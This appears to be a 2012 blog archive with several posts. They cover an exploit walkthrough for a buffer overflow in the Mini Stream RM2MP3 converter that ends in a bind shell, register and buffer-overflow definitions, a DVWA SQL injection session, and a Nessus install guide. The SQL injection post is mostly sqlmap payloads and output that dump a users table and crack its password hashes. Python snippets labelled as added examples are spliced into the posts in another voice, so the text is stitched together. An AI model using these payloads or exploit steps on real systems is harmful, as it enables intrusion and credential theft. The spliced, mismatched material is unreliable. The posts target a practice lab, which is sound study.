Monday, 13 February 2012

BUFFER OVERFLOW MINI STREAM MP3


First we must write the fuzzer code:
After writing the fuzzer, we save it under a name; I saved my fuzzer as moapato.py.
The second step is to run OllyDbg and open the application RM2MP3 Converter.exe. In the fuzzer the output filename is "salim.smi"; the file is written into the python folder and must be moved to the Windows XP machine.
Click Open, and the result will look like the screenshot below.
After that step we start Mini Stream.
With Mini Stream open, return to BackTrack and generate the .smi file as root, following the example in the screenshot below.
After generating it as root, the result looks like this.
Then drag salim.smi into the Mini Stream converter.

The result looks like this.
At ESP we find the character A repeated 25000 times, and EIP is 41414141,
as in the screenshot below.
The script described above can be written in Python; see the example.
For the next step, if the crash succeeds, switch to Windows and run OllyDbg; once OllyDbg is running, the result looks like the screenshot below.

Now try pattern_offset. I got EIP 36695735 and ESP i8Wi9Wj0.


Once we have the EIP and ESP values, we can write a script that takes care of the EIP offset we found.


The result in OllyDbg is shown in the screenshot below; here we check that the position found for EIP is really correct.


Next we try the following script.




After running it, the result looks like this.




From the picture above we can look for a JMP ESP. Usually JMP ESP is found in SHELL32, but not always, so we use a command to search for it module by module.




Once we have the JMP ESP address, the result looks like the screenshot below.





First, start the service as root, as in the screenshot below.




Once it is active, open a browser and go to 127.0.0.1:55555; the result looks like the screenshot below.




Next, search for the Windows shell bind payload and select it; the result looks like this.





After choosing the Windows shell bind payload we have to fill in the fields, as in the example in the screenshot.





Once the fields are filled in, click Generate Payload and the result looks like the screenshot below.


Make a new script.

Run the Python script to produce the file named "salim.smi", then run OllyDbg and start the converter.



While the converter is loading, go back to the root shell and check whether the target has an IP address.


After getting the IP address, use telnet from the root shell to connect.



Type dir.


Success; it will probably be crazy.
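The pattern_create / pattern_offset step above, reimplemented as an added example (not the post's own fuzzer or Metasploit's code) so the EIP and ESP values the post reports can be turned into offsets; the 25000-byte length and the values 36695735 and i8Wi9Wj0 come from the post, everything else is assumed:

```python
"""Cyclic pattern and offset lookup equivalent to the pattern_create /
pattern_offset step above. Added example, not the post's own script;
the register values are the ones the post reports."""
from itertools import product
import string

CRASH_LENGTH = 25000  # the post crashes the converter with 25000 bytes


def pattern_create(length):
    """Build the 'Aa0Aa1Aa2...' pattern; it repeats after 20280 bytes."""
    out = bytearray()
    while len(out) < length:
        for upper, lower, digit in product(string.ascii_uppercase,
                                           string.ascii_lowercase,
                                           string.digits):
            out += (upper + lower + digit).encode()
            if len(out) >= length:
                break
    return bytes(out[:length])


def offset_of_fragment(fragment, length=CRASH_LENGTH):
    """Offset of an ASCII fragment as OllyDbg shows it at ESP (-1 if absent)."""
    return pattern_create(length).find(fragment.encode())


def offset_of_register(hex_value, length=CRASH_LENGTH):
    """Offset of a 32-bit register value as OllyDbg prints it, e.g. '36695735'.
    x86 is little-endian, so the bytes are reversed before searching."""
    needle = bytes.fromhex(hex_value)[::-1]
    return pattern_create(length).find(needle)


def crash_layout(eip_hex, esp_fragment):
    """Where EIP and ESP sit inside the input, and how many bytes separate
    the end of the overwritten return address from the data ESP points at."""
    eip = offset_of_register(eip_hex)
    esp = offset_of_fragment(esp_fragment)
    return {"eip": eip, "esp": esp, "gap": esp - (eip + 4)}


if __name__ == "__main__":
    # Values the post reports after sending the pattern instead of 'A' * 25000.
    print(crash_layout("36695735", "i8Wi9Wj0"))
    # An all-'A' buffer gives EIP 41414141, which the pattern never contains.
    print(offset_of_register("41414141"))
```

The gap value tells you how many bytes lie between the overwritten return address and the data ESP points at, which is what the padding in the later script has to account for.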





Friday, 10 February 2012

Memory Registers

A memory register is a small, high-speed store (5 to 10 times faster than main memory) used to hold the data and instructions currently being processed by the CPU (other instructions waiting their turn stay in main memory). Registers of this kind are divided into two: the Instruction Register (IR), or Program Register, which holds the instruction being processed, and the Program Counter (PC), or Control Counter / instruction counter, which holds the address (memory location) of the instruction being processed.
Registers related to the data being processed are called General Purpose Registers. They serve as Operand Registers (holding the operand or data being processed) and as the Accumulator (holding the result of the arithmetic and logic operations performed by the ALU). In addition to registers, some CPUs use a Cache Memory (also called scratch-pad memory, high-speed buffer or buffer memory) so that the CPU works more efficiently and less time is wasted.

Buffer Overflow

Buffer: storage
Overflow: excess
So the conclusion is:
A buffer overflow is storage that overflows.
But there is also another definition.
A buffer overflow is a method used to exploit a computer system through a weakness in one of the applications the system uses. An application can suffer a buffer overflow because it does not control its data properly, which is usually something the programmer does not realise.

Wednesday, 8 February 2012

DVWA SQL injection Hard Level



Definitions:
SQL injection
SQL injection is a code injection technique that exploits a security vulnerability in a website's software.
Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
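To make the definition concrete, the following added example (not DVWA's code; the table rows are constructed) builds a query shaped like the DVWA id lookup by string concatenation next to its parameterised fix, and shows that the page "displays differently" for a true and a false injected condition only in the vulnerable version. The true payload is the one from the sqlmap output below without the SLEEP; the false one is made up:

```python
"""Vulnerable string-built query beside its parameterised fix, on an
in-memory SQLite table shaped like the DVWA users table.  Added example,
not DVWA's own code; rows are constructed."""
import sqlite3

SAMPLE_USERS = [  # constructed rows with the column names seen in the dump
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]

# Boolean payload from the sqlmap output (SLEEP removed) and a false twin.
TRUE_PAYLOAD = "2' AND 'wjcm'='wjcm"
FALSE_PAYLOAD = "2' AND 'wjcm'='wjcx"  # constructed: same shape, false


def make_db():
    """Create the in-memory table the examples run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the SQL by concatenation: a quote in user_id ends the literal
    and everything after it is executed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the value is data only and can
    never change the statement's structure."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def is_blind_injectable(conn, lookup):
    """The blind-injection condition from the definition: does the response
    differ between a true and a false injected condition?"""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", is_blind_injectable(db, lookup_vulnerable))  # True
    print("parameterised:", is_blind_injectable(db, lookup_safe))    # False
```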
Example: sqlmap

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit


Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit
---

[21:59:36] [INFO] manual usage of GET payloads requires url encoding
[21:59:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[21:59:36] [INFO] fetching database names
[21:59:36] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[21:59:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:59:36

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:02:20

[22:02:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:02:20] [INFO] resuming injection data from session file
[22:02:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[22:02:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit
---

[22:02:20] [INFO] manual usage of GET payloads requires url encoding
[22:02:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:02:20] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[22:02:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:02:20

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa -t users --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:03:15

[22:03:16] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:03:16] [INFO] resuming injection data from session file
[22:03:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[22:03:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit
---

[22:03:16] [INFO] manual usage of GET payloads requires url encoding
[22:03:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:03:16] [INFO] fetching tables for database: dvwa
[22:03:16] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
[22:03:16] [INFO] fetching columns for table 'guestbook' on database 'dvwa'
[22:03:16] [INFO] fetching entries for table 'guestbook' on database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+-------------------------+------------+------+
| comment | comment_id | name |
+-------------------------+------------+------+
| This is a test comment. | 1 | test |
+-------------------------+------------+------+

[22:03:16] [INFO] Table 'dvwa.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[22:03:16] [INFO] fetching columns for table 'users' on database 'dvwa'
[22:03:16] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[22:03:25] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:03:31] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:03:34] [INFO] starting dictionary attack (md5_generic_passwd)
[22:03:34] [INFO] found: 'abc123' for user: 'gordonb'
[22:03:35] [INFO] found: 'charley' for user: '1337'
[22:03:35] [INFO] found: 'letmein' for user: 'pablo'
[22:03:36] [INFO] found: 'password' for user: 'admin'
Database: dvwa
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar | first_name | last_name | password | user | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg | Pablo | Picasso | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | pablo | 4 |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | 1 |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 1337 | 3 |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg | Bob | Smith | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy | 5 |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon | Brown | e99a18c428cb38d5f260853678922e03 (abc123) | gordonb | 2 |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[22:04:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[22:04:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:04:30

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="Cookie: security=low; PHPSESSID=8elfeon7glue479503e24on4t2" --dbs



Thursday, 2 February 2012

Nessus Installation on Linux


1. To install, run the following:
#apt-get install nessus
The installation then proceeds by itself as root.
2. After the installation finishes, follow the message shown first by adding a user for Nessus with the following command:
# /opt/nessus/sbin/nessus-adduser
A prompt like the following then appears:
Login : admin
Authentication (pass/cert) : [pass] pass
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login : admin
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
3. After adding the user, if we try to start the nessus service before registering, the following message appears:
# /etc/init.d/nessusd start
$Starting Nessus : .
Missing plugins. Attempting a plugin update…
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/
4. Register first at the link given; we will be asked for an email address to which an activation code will be sent.
5. Once registration is complete, you will receive an activation code that lets you update the plugins and run the nessus service.
6. Run the following command:
# /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxx-xxxx-xxxx (replace with the activation code you were given)
The following message then appears:
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org…
Your Nessus installation is now up-to-date.
If auto_update is set to ‘yes’ in nessusd.conf, Nessus will
update the plugins by itself.

7. After the plugin update, we can start the nessus service with the following command:
# /etc/init.d/nessusd start
$Starting Nessus :


8. Now you can run Nessus whenever you want.
To run Nessus, open your browser and go to "https://localhost:8834/" to start using Nessus.